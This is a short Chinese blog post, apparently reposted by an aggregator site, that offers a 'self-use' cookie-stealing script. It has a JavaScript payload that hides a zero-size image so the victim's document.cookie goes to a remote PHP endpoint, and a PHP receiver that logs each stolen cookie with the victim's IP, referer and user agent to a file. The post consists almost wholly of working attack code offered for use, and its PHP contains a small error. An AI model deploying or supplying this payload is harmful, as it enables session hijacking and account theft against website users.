自用的打cookie简易js脚本
Posted binggogo
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了自用的打cookie简易js脚本相关的知识,希望对你有一定的参考价值。
js代码
cookie.js代码如下:
var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://ip/cookie.php?cookie='+encodeURIComponent(document.cookie);
php代码
cookie.php代码如下:
<?php
@ini_set('display_errors',1);
$cookie= $_GET['cookie'];
$ip = getenv('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$referer = getenv ('HTTP_REFERER');
$agent = $_SERVER('HTTP_USER_AGENT');
$handler = fopen('cookie.txt', 'a');
fwrite($handler," IP: " .$ip. "
Date and Time: " .$time. "
User Agent:".$agent."
Referer: ".$referer."
Cookie: ".$cookie."
");
fclose($handler);
?>
以上是关于自用的打cookie简易js脚本的主要内容,如果未能解决你的问题,请参考以下文章
Laravel 5.6 - Passport JWT httponly cookie SPA 身份验证用于自用 API?